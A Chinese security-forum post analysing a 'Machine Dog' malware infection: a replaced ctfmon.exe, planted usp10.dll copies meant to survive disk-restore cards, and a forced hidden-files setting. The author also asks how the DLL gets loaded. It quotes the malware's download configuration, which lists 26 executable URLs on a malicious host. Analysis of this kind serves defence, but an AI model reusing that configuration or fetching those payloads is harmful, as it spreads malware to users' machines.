昨晚又遭遇机器狗了,这么老的病毒竟然还有很多人在玩; 去哪个网站中的毒现在都不清楚了, 浏览器是IE7, 每三方控件基本没装一个, 看来用的是IE的漏洞, 还能无声无息, 呵, 我一个补丁都没打,难道是上段时间的那个关于xml的漏洞? 我试了milw0rm上的exploit,虽然能中, 但浏览器会崩溃; 看来有人搞出了很完美的exploit,真正做到了无声无息, 呵, 扯远了....;
被替换了ctfmon.exe, 网络上流传的那些鉴别机器狗的方法早已废掉了(看文件版本呀什么的), 这个被替换了的cftmon.exe, 要看里面的数据才看得出来被修改过了;
这个机器狗最终在下载这些东西:
[file]
open=y
url1=http://www.wixks.com/new/new1.exe
url2=http://www.wixks.com/new/new2.exe
url3=http://www.wixks.com/new/new3.exe
url4=http://www.wixks.com/new/new4.exe
url5=http://www.wixks.com/new/new5.exe
url6=http://www.wixks.com/new/new6.exe
url7=http://www.wixks.com/new/new7.exe
url8=http://www.wixks.com/new/new8.exe
url9=http://www.wixks.com/new/new9.exe
url10=http://www.wixks.com/new/new10.exe
url11=http://www.wixks.com/new/new11.exe
url12=http://www.wixks.com/new/new12.exe
url13=http://www.wixks.com/new/new13.exe
url14=http://www.wixks.com/new/new14.exe
url15=http://www.wixks.com/new/new15.exe
url16=http://www.wixks.com/new/new16.exe
url17=http://www.wixks.com/new/new17.exe
url18=http://www.wixks.com/new/new18.exe
url19=http://www.wixks.com/new/new19.exe
url20=http://www.wixks.com/new/new20.exe
url21=http://www.wixks.com/new/new21.exe
url22=http://www.wixks.com/new/new22.exe
url23=http://www.wixks.com/new/new23.exe
url24=http://www.wixks.com/new/new24.exe
url25=http://www.wixks.com/new/new25.exe
url26=http://www.wixks.com/new/new26.exe
count=26
哇靠, 这人也太....
本贴的重点都还不是这些;
中毒后, D盘被建了上千个usp10.dll, 这个作者是专针对还原卡来的了(因为许多装还原的人只会还原系统盘C盘); usp10.dll执行后一个明显的变化就是不准你显示隐藏的文件,目的就是将它们这一群病毒藏起来,你在文件夹选项里把设置改回来, 它又会强制改回去;
这个usp10.dll, 7KB, 只会在exe的同目录下创建, 确保每一个exe的同目录下都有一个usp10.dll, 目的? 就是让你运行D盘上的exe文件时, 可以启动usp10.dll, 你不是喜欢还原C盘嘛, 就算你清除了机器狗, 它在D盘上还留一手呢;
启动exe, 就会加载usp10.dll, 问题: 它是如何做到的? 修改PE文件的导入表? 看来是这样,但是我用Depends查看这些exe需要加载的DLL时, 并没有usp10.dll, 并且, 把usp10.dll删除, 这些exe一样可以正常装载;
它是如何加载usp10.dll的?
附上一个exe(这个exe是冰刃)与usp10.dll
[课程]Android-CTF解题方法汇总!
上传的附件: